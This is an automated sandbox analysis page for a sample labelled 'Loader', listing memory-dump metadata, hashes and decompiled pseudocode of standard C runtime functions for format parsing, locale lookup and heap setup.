Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c5221d553f34e62e41514e6ec1961af744b7855d317d01abb6a418531f94d2ae
Instruction ID: cf1ec2c118a4b8bb5a4966b4b458d7aef8b71d3be0b1ad7e44ebb404cef6c6fc
Opcode Fuzzy Hash: c5221d553f34e62e41514e6ec1961af744b7855d317d01abb6a418531f94d2ae
Instruction Fuzzy Hash: 2AF0E53630020957CB14DF75D84567B7F94EFC2760B068059FB0A8B660D6719983CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF6BA9 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00AF31F4,?,20001004,00000000,00000002,?,?,00AF2801), ref: 00AF6BDD

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cfc7199ab09d1d3745f82c3b3a54888d822e02222afb1658fea60b57c9f900f2
Instruction ID: b308ae1b42a67ef74e8e9223dec845fbd01c1da950475bf81f42d6f0111c8674
Opcode Fuzzy Hash: cfc7199ab09d1d3745f82c3b3a54888d822e02222afb1658fea60b57c9f900f2
Instruction Fuzzy Hash: 2FE04F3154062CBBCF222FA1EC04EAE7E25EF54750F004010FE05AA121CB319E21AAE4

Uniqueness

Uniqueness Score: -1.00%

Function 00AEDE7B Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00AEDE7B(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E00AEE576(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E00AED7E1(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E00AEE70B(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E00AED7E1(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E00AEE666(_t117, _t110, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E00AED7E1(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E00AEE37A(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E00AEE55E(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E00AEE196(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E00AEE4CB(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E00AEE53F(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E00AEE13C(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E00AEE2E7(0, _t117, _t107, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00aede80
0x00aede81
0x00aede84
0x00aede8a
0x00aede8b
0x00aede8f
0x00aede92
0x00aedf00
0x00aedf03
0x00aedf52
0x00aedf52
0x00aedf55
0x00aedec1
0x00aedec3
0x00aedec8
0x00aedeca
0x00aedf70
0x00aedf73
0x00aee0a7
0x00aee0a7
0x00aee0a9
0x00aee0ac
0x00aee0ac
0x00aedf79
0x00aedf7b
0x00aedf7f
0x00aedf84
0x00aedf8a
0x00aedf8d
0x00aedf90
0x00aedf92
0x00aedfc3
0x00aedfc3
0x00aedfc6
0x00aedfc9
0x00aedfd0
0x00aedfd2
0x00aedfd5
0x00aedfd7
0x00aedfdd
0x00aedfdd
0x00aedfdd
0x00aedfdf
0x00aedfdf
0x00aedfe2
0x00aedfed
0x00aedfed
0x00aedfef
0x00aedfef
0x00aedff1
0x00aedff7
0x00aedff7
0x00aedffc
0x00aedfff
0x00aee00a
0x00aee00c
0x00aee00d
0x00aee00d
0x00aee011
0x00aee011
0x00aee014
0x00aee017
0x00aee01b
0x00aee021
0x00aee027
0x00aee029
0x00aee02d
0x00aee034
0x00aee039
0x00aee03c
0x00aee03c
0x00aee042
0x00aee04f
0x00aee054
0x00aee059
0x00aee05c
0x00aee05e
0x00aee060
0x00aee063
0x00aee066
0x00aee073
0x00aee078
0x00aee078
0x00aee066
0x00aee07f
0x00aee084
0x00aee087
0x00aee08c
0x00aee08f
0x00aee091
0x00aee09e
0x00aee0a3
0x00aee091
0x00000000
0x00aee0a6
0x00aee001
0x00aee004
0x00000000
0x00000000
0x00000000
0x00aee006
0x00aedff3
0x00aedff5
0x00000000
0x00000000
0x00000000
0x00aedff5
0x00aedfe4
0x00aedfe7
0x00000000
0x00000000
0x00aedfe9
0x00000000
0x00aedfe9
0x00aedfd9
0x00000000
0x00aedfd9
0x00aedfcb
0x00aedfce
0x00000000
0x00000000
0x00000000
0x00aedfce
0x00aedf96
0x00aedf99
0x00aedf9b
0x00aedfa3
0x00aedfa5
0x00aedfb4
0x00aedfb6
0x00aedfb8
0x00aedfba
0x00aedfbe
0x00aedfc0
0x00aedfc0
0x00000000
0x00aedfb8
0x00aedfa7
0x00aedfab
0x00aedfab
0x00aedfad
0x00000000
0x00aedfad
0x00aedf9d
0x00000000
0x00aedf9d
0x00aeded0
0x00aeded0
0x00000000
0x00aeded0
0x00aedf5c
0x00aedf5c
0x00aedf5f
0x00aedf31
0x00aedf31
0x00aedf32
0x00aedf34
0x00aedf36
0x00000000
0x00aedf36
0x00aedf61
0x00aedf64
0x00000000
0x00000000
0x00aedf6a
0x00aeded9
0x00aeded9
0x00000000
0x00aeded9
0x00aedf05
0x00aedf48
0x00000000
0x00aedf48
0x00aedf07
0x00aedf0a
0x00aedf3d
0x00aedf3f
0x00000000
0x00aedf3f
0x00aedf0c
0x00aedf0f
0x00aedf2d
0x00aedf2d
0x00aedf2d
0x00aedf2d
0x00000000
0x00aedf2d
0x00aedf11
0x00aedf14
0x00aedf26
0x00000000
0x00aedf26
0x00aedf16
0x00aedf19
0x00000000
0x00000000
0x00aedf1d
0x00000000
0x00aedf1d
0x00aede94
0x00000000
0x00000000
0x00aede9a
0x00aede9c
0x00aededd
0x00aededd
0x00aedee0
0x00aedef9
0x00000000
0x00aedef9
0x00aedee2
0x00aedee2
0x00aedee5
0x00000000
0x00000000
0x00aedee8
0x00aedeeb
0x00000000
0x00000000
0x00aedeed
0x00aedef0
0x00000000
0x00aedef0
0x00aede9e
0x00aeded7
0x00000000
0x00aeded7
0x00aedea3
0x00000000
0x00000000
0x00aedeac
0x00000000
0x00000000
0x00aedeb1
0x00000000
0x00000000
0x00aedeb6
0x00000000
0x00000000
0x00aedebf
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00AEDFF7

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
Instruction ID: 77adb28bc186fcef117d6b046cdecd30f9a4ca99eac91631335ecafcf7d69f78
Opcode Fuzzy Hash: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
Instruction Fuzzy Hash: 62518C706006C857DF38DB2F89DABBE77AA9B22304F14091DE443DF6C1DA619D44C356

Uniqueness

Uniqueness Score: -1.00%

Function 00AFF540 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AFF540() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xb3890c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00aff540
0x00aff548
0x00aff550

APIs

GetProcessHeap.KERNEL32 ref: 00AFF540

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 75ea6bf6f9af5795406f07f391decfa6a1914a85b703bcaba8ba957c413b205b
Instruction ID: 01a908091560550d3e139bd2bd3bb073c1f411f6e31b7b237e37ce8b791e538b
Opcode Fuzzy Hash: 75ea6bf6f9af5795406f07f391decfa6a1914a85b703bcaba8ba957c413b205b
Instruction Fuzzy Hash: B2A011B0A023088B83008F32AE0830E3AA8AA08280300C028A000C3020EE3880008F02

Uniqueness

Uniqueness Score: -1.00%

Function 00AFA089 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0f7ddba64f0facb30a1fe0b521f5e60fc6558e06e4a1c7995406cab5a648e3
Instruction ID: 47bca48e9badc9cf97c1c8247673f250b52ebb238a5596312d18f5087601e524
Opcode Fuzzy Hash: af0f7ddba64f0facb30a1fe0b521f5e60fc6558e06e4a1c7995406cab5a648e3
Instruction Fuzzy Hash: 21323462D29F454DD7239634CC62339A258AFB73D4F15C727F81AB6AA6EF29C4C34102

Uniqueness

Uniqueness Score: -1.00%

Function 00AFE42E Relevance: .3, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00AFE42E(void* __ebx, void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				char _v36;
				char _v136;
				signed int _v140;
				intOrPtr* _v168;
				signed int _v180;
				char _v272;
				char _v420;
				signed int _v448;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t93;
				signed int _t97;
				void* _t99;
				intOrPtr _t111;
				void* _t113;
				signed int _t115;
				signed int _t119;
				intOrPtr _t127;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				intOrPtr _t146;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t152;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				signed int _t172;
				void* _t173;
				void* _t175;
				intOrPtr* _t176;
				signed int _t196;
				intOrPtr* _t198;
				intOrPtr* _t209;
				signed int _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				intOrPtr* _t220;
				void* _t221;
				intOrPtr* _t224;
				signed int _t227;
				intOrPtr* _t229;
				intOrPtr* _t231;
				intOrPtr* _t233;
				void* _t235;
				void* _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t243;
				signed int _t244;
				void* _t245;
				void* _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t252;

				_t234 = __edx;
				_t171 = __ebx;
				_t93 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t93 ^ _t248;
				_t242 = _a4;
				_t245 = E00AF4840(__ecx, __edx);
				asm("sbb ecx, ecx");
				_t97 = E00AF6BA9(_t242, ( ~( *(_t245 + 0x64)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
				if(_t97 != 0) {
					_push(__ebx);
					_t99 = E00AFB834(_t242, _t245,  *((intOrPtr*)(_t245 + 0x54)),  &_v136);
					_t172 = 0;
					_v140 = 0;
					if(_t99 != 0) {
						L15:
						if(( *(_t245 + 0x58) & 0x00000300) == 0x300) {
							L47:
							_t105 =  !( *(_t245 + 0x58) >> 2) & 0x00000001;
							goto L48;
						} else {
							asm("sbb ecx, ecx");
							if(E00AF6BA9(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
								if(E00AFB834(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136) != 0) {
									goto L47;
								} else {
									_t196 =  *(_t245 + 0x58) | 0x00000200;
									 *(_t245 + 0x58) = _t196;
									if( *(_t245 + 0x60) == _t172) {
										if( *((intOrPtr*)(_t245 + 0x5c)) == _t172) {
											L43:
											_t62 = _t245 + 0x2a0; // 0x2a0
											_t234 = _t62;
											 *(_t245 + 0x58) = _t196 | 0x00000100;
											if( *_t62 != _t172) {
												goto L47;
											} else {
												_t198 = _t242;
												_t173 = _t198 + 2;
												do {
													_t111 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t111 != _v140);
												goto L46;
											}
										} else {
											_t239 =  *((intOrPtr*)(_t245 + 0x50));
											_t175 = _t239 + 2;
											do {
												_t146 =  *_t239;
												_t239 = _t239 + 2;
											} while (_t146 != _v140);
											_t241 = _t239 - _t175 >> 1;
											if(_t239 - _t175 >> 1 !=  *((intOrPtr*)(_t245 + 0x5c))) {
												_t172 = 0;
												goto L43;
											} else {
												if(E00AFE8C3(_t175, _t196, _t241, _t242, _t242) != 0) {
													L38:
													 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000100;
													_t59 = _t245 + 0x2a0; // 0x2a0
													_t234 = _t59;
													if( *_t59 != 0) {
														goto L47;
													} else {
														_t220 = _t242;
														_t173 = _t220 + 2;
														do {
															_t149 =  *_t220;
															_t220 = _t220 + 2;
														} while (_t149 != _v140);
														goto L46;
													}
												} else {
													_t176 =  *((intOrPtr*)(_t245 + 0x50));
													_t234 = 0;
													_t221 = _t176 + 2;
													do {
														_t150 =  *_t176;
														_t176 = _t176 + 2;
													} while (_t150 != 0);
													if(E00AFE3FA( *((intOrPtr*)(_t245 + 0x50))) == _t176 - _t221 >> 1) {
														goto L47;
													} else {
														goto L38;
													}
												}
											}
										}
									} else {
										_t45 = _t245 + 0x2a0; // 0x2a0
										_t234 = _t45;
										 *(_t245 + 0x58) = _t196 | 0x00000100;
										if( *_t45 != _t172) {
											goto L47;
										} else {
											_t224 = _t242;
											_t173 = _t224 + 2;
											do {
												_t152 =  *_t224;
												_t224 = _t224 + 2;
											} while (_t152 != _v140);
											L46:
											_t200 = _t198 - _t173 >> 1;
											_push((_t198 - _t173 >> 1) + 1);
											_t113 = E00AFBB23(_t234, 0x55, _t242);
											_t252 = _t251 + 0x10;
											if(_t113 != 0) {
												_t172 = 0;
												goto L51;
											} else {
												goto L47;
											}
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t172;
								goto L18;
							}
						}
					} else {
						asm("sbb eax, eax");
						if(E00AF6BA9(_t242, ( ~( *(_t245 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
							_t161 = E00AFB834(_t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136);
							_t227 =  *(_t245 + 0x58);
							if(_t161 != 0) {
								if((_t227 & 0x00000002) != 0) {
									goto L15;
								} else {
									if( *((intOrPtr*)(_t245 + 0x5c)) == 0) {
										L19:
										if(( *(_t245 + 0x58) & 0x00000001) != 0 || E00AFE8C3(_t172, _t227, _t234, _t242, _t242) == 0) {
											goto L15;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000001;
											_t229 = _t242;
											_t234 = _t229 + 2;
											do {
												_t163 =  *_t229;
												_t229 = _t229 + 2;
											} while (_t163 != _t172);
											goto L14;
										}
									} else {
										_t168 = E00B029D0(0, _t242, _t245,  *((intOrPtr*)(_t245 + 0x50)),  &_v136,  *((intOrPtr*)(_t245 + 0x5c)));
										_t251 = _t251 + 0xc;
										if(_t168 != 0) {
											goto L19;
										} else {
											 *(_t245 + 0x58) =  *(_t245 + 0x58) | 0x00000002;
											_t231 = _t242;
											_t234 = _t231 + 2;
											do {
												_t169 =  *_t231;
												_t231 = _t231 + 2;
											} while (_t169 != 0);
											goto L14;
										}
									}
								}
							} else {
								 *(_t245 + 0x58) = _t227 | 0x00000304;
								_t233 = _t242;
								_t234 = _t233 + 2;
								do {
									_t170 =  *_t233;
									_t233 = _t233 + 2;
								} while (_t170 != 0);
								L14:
								_t200 = _t229 - _t234 >> 1;
								_push((_t229 - _t234 >> 1) + 1);
								_t29 = _t245 + 0x2a0; // 0x2a0
								_t166 = E00AFBB23(_t29, 0x55, _t242);
								_t252 = _t251 + 0x10;
								if(_t166 != 0) {
									L51:
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									_push(_t172);
									E00AED26C();
									asm("int3");
									_push(_t248);
									_t249 = _t252;
									_t115 =  *0xb36bac; // 0x85d5fe2b
									_v180 = _t115 ^ _t249;
									_push(_t245);
									_push(_t242);
									_t243 = _v168;
									_t246 = E00AF4840(_t200, _t234);
									asm("sbb ecx, ecx");
									_t119 = E00AF6BA9(_t243, ( ~( *(_t246 + 0x60)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
									if(_t119 != 0) {
										if(E00AFB834(_t243, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v272) != 0) {
											L58:
											_t125 =  !( *(_t246 + 0x58) >> 2) & 0x00000001;
											goto L59;
										} else {
											_t209 = _t243;
											_push(_t172);
											_t234 = _t209 + 2;
											do {
												_t127 =  *_t209;
												_t209 = _t209 + 2;
											} while (_t127 != 0);
											_t211 = _t209 - _t234 >> 1;
											_push(_t211 + 1);
											_t79 = _t246 + 0x2a0; // 0x2a0
											if(E00AFBB23(_t79, 0x55, _t243) != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00AED26C();
												asm("int3");
												_push(_t249);
												_push(_t211);
												_push(_t246);
												_t247 = _v448;
												_push(_t243);
												if(_t247 == 0) {
													L87:
													_push(2);
													_push( &_v36);
													_push(0x20001004);
												} else {
													_t244 = 0;
													if( *_t247 == 0) {
														goto L87;
													} else {
														_t212 = L"ACP";
														_t139 = _t247;
														while(1) {
															_t235 =  *_t139;
															if(_t235 !=  *_t212) {
																break;
															}
															if(_t235 == 0) {
																L68:
																_t140 = _t244;
															} else {
																_t238 =  *((intOrPtr*)(_t139 + 2));
																if(_t238 !=  *((intOrPtr*)(_t212 + 2))) {
																	break;
																} else {
																	_t139 = _t139 + 4;
																	_t212 = _t212 + 4;
																	if(_t238 != 0) {
																		continue;
																	} else {
																		goto L68;
																	}
																}
															}
															L70:
															if(_t140 == 0) {
																goto L87;
															} else {
																if(E00AFB834(_t244, _t247, _t247, L"utf8") == 0 || E00AFB834(_t244, _t247, _t247, L"utf-8") == 0) {
																	L84:
																	return 0xfde9;
																}
																_t217 = L"OCP";
																_t143 = _t247;
																while(1) {
																	_t236 =  *_t143;
																	if(_t236 !=  *_t217) {
																		break;
																	}
																	if(_t236 != 0) {
																		_t237 =  *((intOrPtr*)(_t143 + 2));
																		if(_t237 !=  *((intOrPtr*)(_t217 + 2))) {
																			break;
																		} else {
																			_t143 = _t143 + 4;
																			_t217 = _t217 + 4;
																			if(_t237 != 0) {
																				continue;
																			} else {
																			}
																		}
																	}
																	L80:
																	if(_t244 != 0) {
																		return E00AF4429(_t217, _t247);
																	}
																	_push(2);
																	_push( &_v36);
																	_push(0x2000000b);
																	goto L82;
																}
																asm("sbb edi, edi");
																_t244 = _t244 | 0x00000001;
																goto L80;
															}
															goto L82;
														}
														asm("sbb eax, eax");
														_t140 = _t139 | 0x00000001;
														goto L70;
													}
												}
												L82:
												_push(_v20 + 0x250);
												if(E00AF6BA9() == 0) {
													return 0;
												}
												_t137 = _v36;
												if(_t137 < 3) {
													goto L84;
												}
												return _t137;
											} else {
												 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000004;
												_pop(_t172);
												goto L58;
											}
										}
									} else {
										 *(_t246 + 0x58) =  *(_t246 + 0x58) & _t119;
										_t125 = _t119 + 1;
										L59:
										return E00AE95ED(_t125, _t172, _v32 ^ _t249, _t234, _t243, _t246);
									}
								} else {
									goto L15;
								}
							}
						} else {
							 *(_t245 + 0x58) =  *(_t245 + 0x58) & 0;
							L18:
							_t105 = 1;
							L48:
							_pop(_t171);
							goto L49;
						}
					}
				} else {
					 *(_t245 + 0x58) =  *(_t245 + 0x58) & _t97;
					_t105 = _t97 + 1;
					L49:
					return E00AE95ED(_t105, _t171, _v8 ^ _t248, _t234, _t242, _t245);
				}
			}

0x00afe42e
0x00afe42e
0x00afe439
0x00afe440
0x00afe445
0x00afe44d
0x00afe45d
0x00afe46d
0x00afe474
0x00afe47f
0x00afe48a
0x00afe48f
0x00afe491
0x00afe49b
0x00afe55e
0x00afe56a
0x00afe6e5
0x00afe6ed
0x00000000
0x00afe570
0x00afe57d
0x00afe595
0x00afe5df
0x00000000
0x00afe5e5
0x00afe5e8
0x00afe5ee
0x00afe5f4
0x00afe62a
0x00afe6a5
0x00afe6ab
0x00afe6ab
0x00afe6b1
0x00afe6b7
0x00000000
0x00afe6b9
0x00afe6b9
0x00afe6bb
0x00afe6be
0x00afe6be
0x00afe6c1
0x00afe6c4
0x00000000
0x00afe6be
0x00afe62c
0x00afe62c
0x00afe62f
0x00afe632
0x00afe632
0x00afe635
0x00afe638
0x00afe643
0x00afe648
0x00afe6a3
0x00000000
0x00afe64a
0x00afe653
0x00afe679
0x00afe679
0x00afe680
0x00afe680
0x00afe68b
0x00000000
0x00afe68d
0x00afe68d
0x00afe68f
0x00afe692
0x00afe692
0x00afe695
0x00afe698
0x00000000
0x00afe6a1
0x00afe655
0x00afe655
0x00afe658
0x00afe65a
0x00afe65d
0x00afe65d
0x00afe660
0x00afe663
0x00afe677
0x00000000
0x00000000
0x00000000
0x00000000
0x00afe677
0x00afe653
0x00afe648
0x00afe5f6
0x00afe5fc
0x00afe5fc
0x00afe602
0x00afe608
0x00000000
0x00afe60e
0x00afe60e
0x00afe610
0x00afe613
0x00afe613
0x00afe616
0x00afe619
0x00afe6cd
0x00afe6cf
0x00afe6d4
